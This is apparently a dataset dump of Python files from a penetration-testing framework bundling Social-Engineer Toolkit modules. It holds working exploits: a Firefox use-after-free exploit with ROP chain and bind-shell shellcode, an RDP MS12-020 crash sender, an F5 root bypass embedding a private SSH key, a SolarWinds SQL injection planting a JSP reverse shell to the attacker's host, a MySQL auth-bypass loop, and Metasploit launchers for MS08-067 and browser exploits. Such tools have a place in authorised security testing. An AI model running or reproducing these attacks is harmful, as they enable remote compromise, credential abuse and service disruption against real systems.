id
int64 0
458k
| file_name
stringlengths 4
119
| file_path
stringlengths 14
227
| content
stringlengths 24
9.96M
| size
int64 24
9.96M
| language
stringclasses 1
value | extension
stringclasses 14
values | total_lines
int64 1
219k
| avg_line_length
float64 2.52
4.63M
| max_line_length
int64 5
9.91M
| alphanum_fraction
float64 0
1
| repo_name
stringlengths 7
101
| repo_stars
int64 100
139k
| repo_forks
int64 0
26.4k
| repo_open_issues
int64 0
2.27k
| repo_license
stringclasses 12
values | repo_extraction_date
stringclasses 433
values |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2,285,800 | sccm_main.py | CHEGEBB_africana-framework/externals/set/src/fasttrack/sccm/sccm_main.py | #!/usr/bin/python3
# coding=utf-8
import os
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("The" + core.bcolors.BOLD + " SCCM Attack Vector " + core.bcolors.ENDC +
"will utilize the SCCM configurations to deploy malicious software. \n\n"
"You need to have the SMSServer name and a PackageID you want to package "
"on the website. Then you need to copy this configuration file to the "
"startup directory for all of the users on the server.")
sms_server = input("Enter the IP address or hostname of the SMS Server: ")
package_id = input("Enter the Package ID of the package you want to patch: ")
configuration = '''
# configuration file written by Dave DeSimone and Bill Readshaw
# attack vector presented at Defcon 20
# added to set 07/27/2012
strSMSServer = "{0}"
strPackageID = "{1}"
Set objLoc = CreateObject("WbemScripting.SWbemLocator")
Set objSMS= objLoc.ConnectServer(strSMSServer, "root\sms")
Set Results = objSMS.ExecQuery _
("SELECT * From SMS_ProviderLocation WHERE ProviderForLocalSite = true")
For each Loc in Results
If Loc.ProviderForLocalSite = True Then
Set objSMS2 = objLoc.ConnectServer(Loc.Machine, "root\sms\site_"& _
Loc.SiteCode)
strSMSSiteCode = Loc.SiteCode
end if
Next
Set objPkgs = objSMS2.ExecQuery("select * from SMS_Package where PackageID = '" & strPackageID & "'")
for each objPkg in objPkgs
objPkg.RefreshPkgSource(0)
Next
'''.format(sms_server, package_id)
# write out the file to reports
with open(os.path.join(core.userconfigpath, "reports/sccm_configuration.txt"), 'w') as filewrite:
filewrite.write(configuration)
core.print_status("The SCCM configuration script has been successfully created.")
core.print_status("You need to copy the script to the startup folder of the server.")
core.print_status("Report has been exported to {0}".format(os.path.join(core.definepath, "reports/sccm_configuration.txt")))
pause = input("Press " + core.bcolors.RED + "{return} " + core.bcolors.ENDC + "to exit this menu.")
| 2,117 | Python | .py | 46 | 43.391304 | 124 | 0.750607 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,801 | ms08067.py | CHEGEBB_africana-framework/externals/set/src/fasttrack/exploits/ms08067.py | #!/usr/bin/env python3
# coding=utf-8
#
#
# This has been redesigned to use the MS08-067 in Metasploit which is much more reliable.
#
#
#
import subprocess
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
def create_rc(revhost, victim, payload, port):
with open("/root/.set/ms08-067.rc" + "w") as filewrite:
filewrite.write("use exploit/windows/smb/ms08_067_netapi\n"
"set payload {0}\n"
"set RHOST {1}\n"
"set LPORT {2}\n"
"set LHOST {3}\n"
"exploit\n\n".format(payload, victim, port, revhost))
def launch_msf():
subprocess.Popen("msfconsole -r /root/.set/ms08-067.rc", shell=True).wait()
revhost = input("Enter your LHOST (attacker IP address) for the reverse listener: ")
revport = input("Enter your LPORT (attacker port) for the reverse listener: ")
victim = input("Enter the RHOST (victim IP) for MS08-067: ")
payload = input("Enter your payload (example: windows/meterpreter/reverse_https) - just hit enter for reverse_https: ")
if not payload:
payload = "windows/meterpreter/reverse_https"
# create the rc file
create_rc(revhost, victim, payload, revport)
# launch msf
launch_msf()
| 1,302 | Python | .py | 35 | 31.714286 | 119 | 0.663225 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,802 | firefox_3_6_16.py | CHEGEBB_africana-framework/externals/set/src/fasttrack/exploits/firefox_3_6_16.py | #!/usr/bin/env python3
# coding=utf-8
# Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) by Mr_Me
try: # Py2
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
except ImportError: # Py3
from http.server import BaseHTTPRequestHandler, HTTPServer
class myRequestHandler(BaseHTTPRequestHandler):
try:
def do_GET(self):
# Always Accept GET
self.printCustomHTTPResponse(200)
if self.path == "/":
target = self.client_address[0]
self.wfile.write("""
<html>
<body>
<applet code="rubik.class" width=140 height=140></applet>
<p><b>Mozilla mChannel Object use after free</b><br />
- Found by regenrecht<br />
- MSF exploit by Rh0<br />
- Win 7 fun version by mr_me</p>
<!--
Notes:
- This exploit requires <= java 6 update 25.
- optimized heap spray and still works on mutiple tabs as
the spray is large enough to hit the 0x10000000 block.
- If you really want the class file you can get it here:
http://javaboutique.internet.com/Rubik/rubik.class,
but java still loads without it.
- Tested on windows 7 ultimate (latest updates).
- http://bit.ly/qD4Jkc
-->
<object id="d"><object>
<script type="text/javascript">
function trigger(){
alert('ready?');
fakeobject = document.getElementById("d"); // allocate the object
fakeobject.QueryInterface(Components.interfaces.nsIChannelEventSink); // append to the objects available functions
fakeobject.onChannelRedirect(null,new Object,0); // free it
/*
fill the object with a fake vtable reference
just use the start of a block for simplicity and use \x00
because it expands to a NULL so that
when we have have the CALL DWORD PTR DS:[ECX+18], it will point to 0x10000000
*/
fakevtable = unescape("\x00%u1000");
var rop = "";
// 3 instructions to pivot cleanly
rop += unescape("%u1033%u6d7f"); // 0x6D7F1033 -> MOV EAX,[ECX] / PUSH EDI / CALL [EAX+4] <jvm.dll>
rop += unescape("%u10a7%u6d7f"); // 0x6D7F10A7 -> POP EBP / RETN <jvm.dll>
rop += unescape("%u1441%u6d7f"); // 0x6D7F1441 -> XCHG EAX,ESP / RETN <jvm.dll>
// generic rop taken from MSVCR71.dll (thanks to corelanc0d3r)
rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> Make EAX readable
rop += unescape("%u591f%u7c37"); // 0x7c37591f -> PUSH ESP / ... / POP ECX / POP EBP / RETN
rop += unescape("%uf004%ubeef"); // 0x41414141 -> EBP (filler)
rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> *&VirtualProtect()
rop += unescape("%u30ea%u7c35"); // 0x7c3530ea -> MOV EAX,[EAX] / RETN
rop += unescape("%u6c0b%u7c34"); // 0x7c346c0b -> Slide, so next gadget would write to correct stack location
rop += unescape("%u6069%u7c37"); // 0x7c376069 -> MOV [ECX+1C],EAX / POP EDI / POP ESI / POP EBX / RETN
rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EDI (filler)
rop += unescape("%uf00d%ubeef"); // 0x41414141 -> will be patched at runtime (VP), then picked up into ESI
rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EBX (filler)
rop += unescape("%u6402%u7c37"); // 0x7c376402 -> POP EBP / RETN
rop += unescape("%u5c30%u7c34"); // 0x7c345c30 -> ptr to 'push esp / ret '
rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
rop += unescape("%udfff%uffff"); // 0xfffffdff -> size 0x00000201 -> ebx, modify if needed
rop += unescape("%u1e05%u7c35"); // 0x7c351e05 -> NEG EAX / RETN
rop += unescape("%u4901%u7c35"); // 0x7c354901 -> POP EBX / RETN
rop += unescape("%uffff%uffff"); // 0xffffffff -> pop value into ebx
rop += unescape("%u5255%u7c34"); // 0x7c345255 -> INC EBX / FPATAN / RETN
rop += unescape("%u2174%u7c35"); // 0x7c352174 -> ADD EBX,EAX / XOR EAX,EAX / INC EAX / RETN
rop += unescape("%ud201%u7c34"); // 0x7c34d201 -> POP ECX / RETN
rop += unescape("%ub001%u7c38"); // 0x7c38b001 -> RW pointer (lpOldProtect) (-> ecx)
rop += unescape("%ub8d7%u7c34"); // 0x7c34b8d7 -> POP EDI / RETN
rop += unescape("%ub8d8%u7c34"); // 0x7c34b8d8 -> ROP NOP (-> edi)
rop += unescape("%u4f87%u7c34"); // 0x7c344f87 -> POP EDX / RETN
rop += unescape("%uffc0%uffff"); // 0xffffffc0 -> value to negate, target value : 0x00000040, target: edx
rop += unescape("%u1eb1%u7c35"); // 0x7c351eb1 -> NEG EDX / RETN
rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
rop += unescape("%u9090%u9090"); // 0x90909090 -> NOPS (-> eax)
rop += unescape("%u8c81%u7c37"); // 0x7c378c81 -> PUSHAD / ADD AL,0EF / RETN
sc = rop;
// metasploit bind shell port 4444
sc += unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650%u5656%u5646%u564e%u5356%u6856%ucc79%u863f%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u41d5");
// create a string with a ptr to the offset of our rop
// used 0x1000001c to accomidate 0x18 + 0x4 (1st rop gadget)
var filler = unescape("%u001c%u1000");
while(filler.length < 0x100) {filler += filler;}
/*
create a string with 0x18 bytes at the start containing ptr's to the rop.
This is to account for the vtable offset (0x18) -> 'CALL DWORD PTR DS:[ECX+18]'
Then fill with sc + junk
*/
var chunk = filler.substring(0,0x18/2);
chunk += sc;
chunk += filler;
// create a string of size 64k in memory that contains sc + filler
var heapblock = chunk.substring(0,0x10000/2);
// keep adding more memory that contains sc + filler to reach 512kB
while (heapblock.length<0x80000) {heapblock += heapblock;}
/*
using a final string of 512kB so that the spray is fast but ensuring accuracy
- sub the block header length (0x24)
- sub 1/4 of a page for sc (0x400)
- sub the string length (0x04)
- sub the null byte terminator
*/
var finalspray = heapblock.substring(0,0x80000 - sc.length - 0x24/2 - 0x4/2 - 0x2/2);
// optimised spray, precision can still be reliable even with tabs.
// force allocation here of 128 blocks, using only 64MB of memory, speeeeeeed.
arrayOfHeapBlocks = new Array()
for (n=0;n<0x80;n++){
arrayOfHeapBlocks[n] = finalspray + sc;
}
}
trigger();
</script>
</body>
</html>
""")
self.wfile.write("""<title>Please wait...</title></head><body>""")
self.wfile.write("""<left><body bgcolor="Black"><font color="White">
Please wait<br>""")
print(("\n\n[-] Exploit sent... [-]\n"
"[-] Wait about 30 seconds and attempt to connect.[-]\n"
"[-] Connect to IP Address: {0} and port 4444 [-]".format(target)))
# Print custom HTTP Response
def printCustomHTTPResponse(self, respcode):
self.send_response(respcode)
self.send_header("Content-type", "text/html")
self.send_header("Server", "myRequestHandler")
self.end_headers()
# In case of exceptions, pass them
except:
pass
httpd = HTTPServer(('', 80), myRequestHandler)
print("""
#####################################################################################
# Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) by Mr. Me. #
#####################################################################################
""")
print(" [-] Starting Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) [-]")
print(" [-] Have someone connect to you on port 80 [-]")
print("\n\n <ctrl>-c to Cancel")
try:
# handle the connections
httpd.handle_request()
# Serve HTTP server forever
httpd.serve_forever()
# Except Keyboard Interrupts and throw custom message
except KeyboardInterrupt:
print("\n\n Exiting exploit...\n\n")
| 9,079 | Python | .py | 155 | 51.064516 | 1,053 | 0.631603 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,803 | rdpdos.py | CHEGEBB_africana-framework/externals/set/src/fasttrack/exploits/rdpdos.py | # coding=utf-8
# Exploit Title: Pakyu Cenloder
# Date: March 16 2012
# Author: BMario
# Application Link: Microsoft Terminal Services / Remote Desktop Services
# http://msdn.microsoft.com/en-us/library/aa383015(v=vs.85).aspx
# Version: any Windows version before 13 Mar 2012
# Platforms: Windows
# Bug: use after free
# Exploitation: remote, versus server
# Author: Stanley Marshall
# Tested on: Windows 7 32bit
# CVE : MS12-020
import socket
import binascii
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("Microsoft Terminal Services / Remote Desktop Services - Denial of Service")
headpack = binascii.hexlify(b"030000130ee000000000000100080000000000")
dafuq = b"030001d602f0807f658201940401010401010101f" \
b"f3019020400000000020400000002020400000000" \
b"0204000000010204000000000204000000010202f" \
b"fff02040000000230190204000000010204000000" \
b"01020400000001020400000001020400000000020" \
b"40000000102020420020400000002301c0202ffff" \
b"0202fc170202ffff0204000000010204000000000" \
b"204000000010202ffff0204000000020482013300" \
b"0500147c0001812a000800100001c000447563618" \
b"11c01c0d800040008008002e00101ca03aa090400" \
b"00ce0e000048004f0053005400000000000000000" \
b"00000000000000000000000000000000004000000" \
b"000000000c0000000000000000000000000000000" \
b"00000000000000000000000000000000000000000" \
b"00000000000000000000000000000000000000000" \
b"00000000000000000000001ca0100000000001000" \
b"07000100300030003000300030002d00300030003" \
b"0002d0030003000300030003000300030002d0030" \
b"00300030003000300000000000000000000000000" \
b"000000000000000000000000004c00c000d000000" \
b"0000000002c00c001b0000000000000003c02c000" \
b"3000000726470647200000000008080636c697072" \
b"6472000000a0c0726470736e640000000000c0"
dafuq = binascii.hexlify(dafuq)
dafree = binascii.hexlify(b"0300000802f08028")
trololo = headpack + dafuq + dafree
#HOSTNYO = sys.argv[1]
HOSTNYO = input("Enter the IP address to crash (remote desktop): ")
PORTNYO = 3389
for i in range(10240):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOSTNYO, PORTNYO))
s.send(trololo)
rec = s.recv(1024)
s.close()
| 2,414 | Python | .py | 58 | 36.965517 | 82 | 0.766184 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,804 | f5.py | CHEGEBB_africana-framework/externals/set/src/fasttrack/exploits/f5.py | #!/usr/bin/python3
# coding=utf-8
#
# Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
#
# Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
# http://www.trustedsec.com
#
#
import os
import subprocess
try:
with open("priv.key", 'w') as filewrite:
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----""")
subprocess.Popen("chmod 700 priv.key", shell=True).wait()
print("""
Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
http://www.trustedsec.com
""")
ipaddr = input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@{0}".format(ipaddr), shell=True).wait()
finally:
if os.path.isfile("priv.key"):
os.remove("priv.key")
| 1,813 | Python | .py | 39 | 41.128205 | 82 | 0.772009 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,805 | mysql_bypass.py | CHEGEBB_africana-framework/externals/set/src/fasttrack/exploits/mysql_bypass.py | #!/usr/bin/python3
# coding=utf-8
#
#
# This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
#
# Title: MySQL Remote Root Authentication Bypass
# Written by: Dave Kennedy (ReL1K)
# http://www.trustedsec.com
#
# Original advisory here: seclists.org/oss-sec/2012/q2/493
#
import subprocess
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("""
This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
Title: MySQL Remote Root Authentication Bypass
Written by: Dave Kennedy (ReL1K)
http://www.trustedsec.com
Original advisory here: seclists.org/oss-sec/2012/q2/493
Note, you will see a number of failed login attempts, after about 300, if it doesn't
work, then its not vulnerable.
""")
ipaddr = input("Enter the IP address of the mysql server: ")
while True:
subprocess.Popen("mysql --host={0} -u root mysql --password=blah".format(ipaddr), shell=True).wait()
| 1,006 | Python | .py | 31 | 30.870968 | 104 | 0.764706 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,806 | solarwinds.py | CHEGEBB_africana-framework/externals/set/src/fasttrack/exploits/solarwinds.py | #!/usr/bin/python3
# coding=utf-8
##########################################################################
# Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit
# Date: May 2nd 2012
# Author: muts
# Version: SolarWinds Storage Manager 5.1.0
# Tested on: Windows 2003
# Archive Url : http://www.offensive-security.com/0day/solarshell.txt
##########################################################################
# Discovered by Digital Defence - DDIVRT-2011-39
##########################################################################
import ntpath
import random
import binascii
try: # Py2
from cookielib import CookieJar
from urllib2 import build_opener, HTTPCookieProcessor
from urllib import urlencode
except ImportError: # Py3
from http.cookiejar import CookieJar
from urllib.request import build_opener, HTTPCookieProcessor
from urllib.parse import urlencode
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("\n[*] Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit")
print("[*] Vulnerability discovered by Digital Defence - DDIVRT-2011-39")
print("[*] Offensive Security - http://www.offensive-security.com\n")
# if (len(sys.argv) != 4):
# print "[*] Usage: solarshell.py <RHOST> <LHOST> <LPORT>"
# exit(0)
# rhost = sys.argv[1]
# lhost = sys.argv[2]
# lport = sys.argv[3]
rhost = input("Enter the remote host IP address: ")
lhost = input("Enter the attacker IP address: ")
lport = input("Enter the local port: ")
filename = ''
for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890', 6):
filename += i
filename += ".jsp"
output_path = ntpath.join("c:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/", filename)
jsp = '''<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{{
InputStream is;
OutputStream os;
StreamConnector( InputStream is, OutputStream os )
{{
this.is = is;
this.os = os;
}}
public void run()
{{
BufferedReader in = null;
BufferedWriter out = null;
try
{{
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{{
out.write( buffer, 0, length );
out.flush();
}}
}} catch( Exception e ){{}}
try
{{
if( in != null )
in.close();
if( out != null )
out.close();
}} catch( Exception e ){{}}
}}
}}
try
{{
Socket socket = new Socket( "''{lhost}''", ''{lport}'');
Process process = Runtime.getRuntime().exec( "cmd.exe" );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
}} catch( Exception e ) {{}}
%>'''.format(lhost=lhost, lport=lport)
jsp = jsp.replace("\n", "")
jsp = jsp.replace("\t", "")
prepayload = "AAA' "
prepayload += 'union select 0x{0},2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile "{1}"'.format(binascii.hexlify(jsp.encode('ascii')), output_path)
prepayload += "#"
postpayload = "1' or 1=1#--"
loginstate = 'checkLogin'
password = 'OHAI'
cj = CookieJar()
opener = build_opener(HTTPCookieProcessor(cj))
post_params = urlencode({'loginState': loginstate, 'loginName': prepayload, 'password': password})
print("[*] Sending evil payload")
opener.open("http://{0}:9000/LoginServlet".format(rhost), post_params.encode())
print("[*] Triggering shell")
post_params = urlencode({'loginState': loginstate, 'loginName': postpayload, 'password': password})
opener.open("http://{0}:9000/LoginServlet".format(rhost), post_params.encode())
opener.open("http://{0}:9000/{1}".format(rhost, filename))
print("[*] Check your shell on {0} {1}\n".format(lhost, lport))
# 01010011 01101100 01100101 01100101 01110000 01101001 01110011 01101111
# 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100
| 4,256 | Python | .py | 113 | 34.212389 | 143 | 0.644833 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,807 | qrgenerator.py | CHEGEBB_africana-framework/externals/set/src/qrcode/qrgenerator.py | # coding=utf-8
import os
import time
import src.core.setcore as core
import qrcode
# generate the qrcode and save it definition
def gen_qrcode(url):
# generate the qrcode
qr = qrcode.QRCode(5, error_correction=qrcode.constants.ERROR_CORRECT_L)
qr.add_data(url)
qr.make()
im = qr.make_image()
time.sleep(1)
qr_img_path = os.path.join(core.userconfigpath, "reports/qrcode_attack.png")
if os.path.isfile(qr_img_path):
os.remove(qr_img_path)
# save the image out
im.save(qr_img_path, format='png')
# print that its been successful
core.print_status("QRCode has been generated under {0}".format(qr_img_path)) | 665 | Python | .py | 20 | 29.2 | 80 | 0.710938 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,808 | unsigned.py | CHEGEBB_africana-framework/externals/set/src/webattack/java_applet/unsigned.py | #!/usr/bin/python3
#
# simple jar file
#
import subprocess
import os
subprocess.Popen("rm Java_Update.jar", stderr=subprocess.PIPE,
stdout=subprocess.PIPE, shell=True)
subprocess.Popen("rm Java.class", stderr=subprocess.PIPE,
stdout=subprocess.PIPE, shell=True)
subprocess.Popen("javac Java.java", shell=True).wait()
subprocess.Popen("jar cvf Java_Update.jar Java.class", shell=True).wait()
subprocess.Popen("jar ufm Java_Update.jar manifest.mf", shell=True).wait()
subprocess.Popen(
"cp Java_Update.jar ../../html/unsigned/unsigned.jar", shell=True)
print("[*] Jar file exported as Java_Update.jar")
| 639 | Python | .py | 16 | 36.5625 | 74 | 0.730337 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,809 | sign_jar.py | CHEGEBB_africana-framework/externals/set/src/webattack/java_applet/sign_jar.py | #!/usr/bin/env python3
#
# simple jar file
#
import subprocess
import os
try:
print("""
Simply enter in the required fields, easy example below:
Name: FakeCompany
Organization: Fake Company
Organization Name: Fake Company
City: Cleveland
State: Ohio
Country: US
Is this correct: yes
""")
print("""*** WARNING ***\nIN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk\n*** WARNING ***""")
# grab keystore to use later
subprocess.Popen(
"keytool -genkey -alias signapplet2 -keystore mykeystore -keypass mykeypass -storepass mystorepass", shell=True).wait()
# self-sign the applet
subprocess.Popen(
"jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar Java_Obf.jar signapplet2", shell=True).wait()
# move it into our html directory
subprocess.Popen("rm ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen(
"cp Signed_Update.jar ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen(
"cp Java_Obf.jar ../../html/unsigned/unsigned.jar", shell=True).wait()
print("[*] New java applet has been successfully imported into The Social-Engineer Toolkit (SET)")
except:
pass
| 1,288 | Python | .py | 33 | 35.545455 | 158 | 0.723065 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,810 | gen_payload.py | CHEGEBB_africana-framework/externals/set/src/webattack/browser_exploits/gen_payload.py | #!/usr/bin/env python3
# This module is for the metasploit browser exploits
import re
import os
from src.core.setcore import *
from src.core.menu.text import *
from src.core.dictionaries import *
definepath = os.getcwd()
me = mod_name()
port = ""
# see if multi_attack is being used and prep everything we need
multiattack = "off"
webdav_enabled = "off"
if os.path.isfile(userconfigpath + "multi_payload"):
multiattack = "on"
# just need a simple filewrite to generate a file if webdav is enabled
# this is used for multi attack, it will write out file to program junk
# then a simple check will determine if webdav is enabled for the port
webdav_enabled = "off"
webdav_write = open(userconfigpath + "webdav_enabled", "w")
fileopen = open(userconfigpath + "multi_payload", "r")
for line in fileopen:
match = re.search("MAIN=", line)
if match:
port = line.replace("MAIN=", "")
match2 = re.search("MAINPAYLOAD=", line)
if match2:
exploit = line.replace("MAINPAYLOAD=", line)
# grab metasploit path
metasploit_iframe = "8080"
msf_path = meta_path()
configfile = open("/etc/setoolkit/set.config", "r").readlines()
for line in configfile:
line = line.rstrip()
match4 = re.search("METERPRETER_MULTI_SCRIPT=", line)
if match4:
meterpreter_multi = line.replace("METERPRETER_MULTI_SCRIPT=", "")
match5 = re.search("METERPRETER_MULTI_COMMANDS=", line)
if match5:
meterpreter_multi_command = line.replace(
"METERPRETER_MULTI_COMMANDS=", "")
meterpreter_multi_command = meterpreter_multi_command.replace(
";", "\n")
match6 = re.search("METASPLOIT_IFRAME_PORT=", line)
if match6:
metasploit_iframe = line.replace("METASPLOIT_IFRAME_PORT=", "")
match7 = re.search("AUTO_MIGRATE=", line)
if match7:
auto_migrate = line.replace("AUTO_MIGRATE=", "")
# grab attack vector
attack_vector = ""
if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(userconfigpath + "attack_vector")
for line in fileopen:
attack_vector = line.rstrip()
# open ipaddr
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = input("Enter your ipaddress: ")
update_options("IPADDR=" + ipaddr)
debug_msg(me, "printing 'text.browser_exploits_menu'", 5)
show_browserexploit_menu = create_menu(
browser_exploits_text, browser_exploits_menu)
exploit = input(setprompt(["4"], ""))
if exploit == '':
print("\n Defaulting to IE CSS Import Use After Free exploit.....")
exploit = ("1")
# dictionary = ms_module
exploit = ms_module(exploit)
choice1 = ""
if multiattack == "off":
if exploit != "windows/browser/java_codebase_trust":
show_payload_menu_2 = create_menu(payload_menu_2_text, payload_menu_2)
choice1 = input(setprompt(["4"], ""))
if choice1 == '':
choice1 = '2'
choice1 = ms_payload(choice1)
# if we are using the java exploit
if exploit == "exploit/windows/browser/java_codebase_trust" or exploit == "exploit/multi/browser/java_atomicreferencearray" or exploit == "exploit/multi/browser/java_verifier_field_access" or exploit == "exploit/multi/browser/java_jre17_exec" or exploit == "exploit/multi/browser/java_jre17_jmxbean" or exploit == "exploit/multi/browser/java_jre17_jmxbean_2":
print("[*] Selecting Java Meterpreter as payload since it is exploit specific.")
choice1 = ("java/meterpreter/reverse_tcp")
if multiattack == "off":
port = input(setprompt(["4"], "Port to use for the reverse [443]"))
if port == "":
port = "443"
# check to see if we need to use the multi attack vector in java
if not os.path.isfile(userconfigpath + "multi_java"):
filewrite = open(userconfigpath + "meta_config", "w")
if os.path.isfile(userconfigpath + "multi_java"):
filewrite = open(userconfigpath + "meta_config", "a")
filewrite.write("use " + exploit + "\n")
filewrite.write("set PAYLOAD " + choice1 + "\n")
filewrite.write("set LHOST " + ipaddr + "\n")
filewrite.write("set LPORT %s" % (port) + "\n")
#filewrite.write("set ENCODING shikata_ga_nai"+"\n")
filewrite.write("set URIPATH /" + "\n")
if choice1 == ("windows/download_exec"):
